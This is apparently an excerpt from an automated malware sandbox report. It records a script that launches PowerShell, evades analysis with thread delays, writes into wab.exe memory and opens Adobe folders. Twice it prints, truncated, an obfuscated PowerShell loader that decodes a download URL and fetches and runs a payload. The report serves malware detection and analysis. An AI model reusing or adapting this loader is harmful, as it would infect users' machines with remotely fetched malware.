              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4515Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5379Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6194Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3621Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3320Thread sleep count: 6194 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3320Thread sleep count: 3621 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 352Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
              Source: powershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04A1DAAC LdrInitializeThunk,LdrInitializeThunk,4_2_04A1DAAC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_2656.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3860000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 15FCF8Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
